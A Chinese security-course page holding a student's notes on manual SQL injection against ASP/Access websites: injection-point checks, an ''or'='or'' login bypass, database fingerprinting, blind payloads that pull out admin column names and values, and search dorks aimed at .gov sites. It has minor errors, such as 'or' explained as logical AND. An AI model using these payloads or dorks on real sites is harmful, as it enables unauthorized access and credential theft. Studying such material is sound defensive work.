1. 首页
  2. 安全技术
  3. 安全测试
  4. 安全测试
  5. 安全测试与深度防御
21人加入学习
(0人评价)
安全测试与深度防御
价格 ¥ 599.00
课程还未发布,不允许加入和购买

判断注入点:

www.xx.xom/a.asp?id=1

and 1=1 返回正常

and 1=1 返回错误

and:逻辑与 A and B

or:逻辑与;A and B:只要一个为真结果都返真

万能口令:'or'='or'民办大学网站这样很多

 

判断数据库的类型:

access 独有表:mssysobjects

mssql:sysobjects

oracle:sys.user_tables

 

手工注入access

1.判断表名:admin;user,userinfo

判断表存在方法:(select count(*) from admin)>0

判断列存在方法:

and (select count(admin_user) from admin)>0

判断长度:len(admin_user)>4

and (select len(admin_user) from admin)>4

md5密码16位

判断值:left(admin_user,2)='aa'

and (select left(admin_user,i) from admin='a')

自动化工具:

domain,ad,管中

收索:

google : inurl:.gov asp+id

baidu: inurl:asp?id=

以上小心使用。

1.判断注入点

2.判断表名

3.判断列

4.判断列长度

5.判断值

6.自动化工具

 

 

[展开全文]
广州大学_YI · 2017-01-21 · 手工注入access 0

授课教师

hyqkx1977
专职资深讲师

课程特色

视频(15)
下载资料(1)

最新学员

学员动态

广州大学高先生 开始学习 安全测试常用方法-上
CLJY 开始学习 渗透常用攻击方法-上
广州大学_kingda丶 开始学习 账号克隆shift后门
广州大学_kingda丶 完成了 入侵实例-下载资料
广州大学_kingda丶 开始学习 入侵实例-下载资料